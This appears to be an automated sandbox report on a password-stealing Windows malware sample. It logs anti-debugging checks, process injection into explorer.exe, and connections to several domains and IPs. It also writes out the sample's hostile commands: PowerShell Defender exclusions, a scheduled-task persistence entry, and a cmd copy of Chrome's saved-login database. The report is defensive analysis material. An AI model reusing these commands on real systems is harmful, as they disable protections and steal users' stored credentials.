          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E5210 mov eax, dword ptr fs:[00000030h]10_2_017E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F8A0A mov eax, dword ptr fs:[00000030h]10_2_017F8A0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01803A1C mov eax, dword ptr fs:[00000030h]10_2_01803A1C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AAA16 mov eax, dword ptr fs:[00000030h]10_2_018AAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AAA16 mov eax, dword ptr fs:[00000030h]10_2_018AAA16
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1229 mov eax, dword ptr fs:[00000030h]10_2_018A1229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A229 mov eax, dword ptr fs:[00000030h]10_2_0180A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6F60 mov eax, dword ptr fs:[00000030h]10_2_017E6F60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FFF60 mov eax, dword ptr fs:[00000030h]10_2_017FFF60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EA745 mov eax, dword ptr fs:[00000030h]10_2_017EA745
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FEF40 mov eax, dword ptr fs:[00000030h]10_2_017FEF40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6730 mov eax, dword ptr fs:[00000030h]10_2_017E6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6730 mov eax, dword ptr fs:[00000030h]10_2_017E6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6730 mov eax, dword ptr fs:[00000030h]10_2_017E6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4F2E mov eax, dword ptr fs:[00000030h]10_2_017E4F2E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4F2E mov eax, dword ptr fs:[00000030h]10_2_017E4F2E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A17D2 mov eax, dword ptr fs:[00000030h]10_2_018A17D2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018097ED mov eax, dword ptr fs:[00000030h]10_2_018097ED
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829860 NtQuerySystemInformation,LdrInitializeThunk,10_2_01829860
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Domain query: www.naspewt.xyz
          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Domain query: www.mattewigs.com
          Source: C:\Windows\explorer.exe Network Connect: 172.67.215.254 80
          Source: C:\Windows\explorer.exe Domain query: www.vestostore.com
          Source: C:\Windows\explorer.exe Domain query: www.ballthingsez.com
          Source: C:\Windows\explorer.exe Network Connect: 76.223.26.96 80
          Source: C:\Windows\explorer.exe Network Connect: 184.94.215.140 80
          Source: C:\Windows\explorer.exe Network Connect: 152.199.21.175 80
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Network Connect: 34.149.87.45 80
          Source: C:\Windows\explorer.exe Domain query: www.saleschildcarriers.com
          Source: C:\Windows\explorer.exe Domain query: www.myccsmartmove.com
          Source: C:\Windows\explorer.exe Domain query: www.takealicense.com
          Source: C:\Windows\explorer.exe Network Connect: 86.38.202.187 80
          Source: C:\Windows\explorer.exe Domain query: www.dlafluid.com
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1330000
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Memory written: C:\Users\user\AppData\Roaming\hkkRsa.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Thread register set: target process: 3324
          Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3324
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmp"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmp22F9.tmp"
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Process created: C:\Users\user\AppData\Roaming\hkkRsa.exe C:\Users\user\AppData\Roaming\hkkRsa.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: explorer.exe, 0000000F.00000003.575314509.00000000086B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.452267737.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.460990982.0000000005910000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000F.00000000.452267737.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
          Source: explorer.exe, 0000000F.00000000.452267737.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 0000000F.00000000.452267737.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 0000000F.00000000.451928214.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
